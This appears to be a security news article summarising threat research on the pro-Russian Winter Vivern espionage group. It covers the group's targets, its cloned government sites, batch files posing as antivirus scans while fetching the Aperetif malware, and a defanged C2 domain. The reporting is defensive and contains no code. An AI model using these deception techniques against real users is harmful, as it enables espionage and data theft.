To perform espionage, an advanced hacking group known as 'Winter Vivern' targets European government organizations and telecommunications service providers.
Since this group's activities align with the interests of the Russian and Belarusian governments, it is presumed to be a pro-Russian APT (advanced persistent threat) group.
According to SentinelLabs, the threat group operates with limited resources; however, their creativity compensates for these constraints.
Winter Vivern was first observed targeting government organizations in Lithuania, Slovakia, the Vatican, and India in 2021, according to DomainTools.
Sentinel Labs has observed hackers targeting individuals working in the governments of Poland, Italy, Ukraine, and India in recent campaigns. In addition to high-profile state targets, hackers have targeted telecommunications companies, such as those that have been supporting Ukraine since Russia's invasion.
Beginning in early 2023, the hackers imitated the websites of Poland's Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Ukrainian Security Service. These sites send malicious files to visitors who arrive after clicking on links in malicious emails.
SentinelLabs has previously observed spreadsheet files (XLS) containing malicious macros that launch PowerShell being dropped on APT-cloned sites.
Using bogus virus scanners
In the Sentinel Labs report, one example of Winter Vivern's resourcefulness is the use of Windows batch files to impersonate antivirus scanners while downloading malicious payloads. The malicious files pretend to run an antivirus scan, displaying a percentage of the remaining time while quietly downloading a malicious payload via PowerShell.
The payload delivered through this process is known as "Aperetif," and it was detailed in a February 2023 report by the Ukrainian CERT. The malware is hosted on infected WordPress websites, which are frequently used in malware distribution campaigns.
The Aperetif malware can automatically scan and exfiltrate files, take screenshots, and send all data in a base64-encoded format to a hardcoded command and control server URL (marakanas[.]com). SentinelLabs recently discovered a new payload used by Winter Vivern that appears to be functionally similar to Aperefit, but it has an incomplete design, indicating that it is a stage of development.
The malware beacons connect to the C2 using PowerShell in both cases, which overlap in their deployment and wait for instructions or additional payloads. To summarise, Winter Vivern is a group that uses a relatively simple yet effective method to trick its victims into downloading malicious files. At the same time, their low profile has allowed them to remain unnoticed.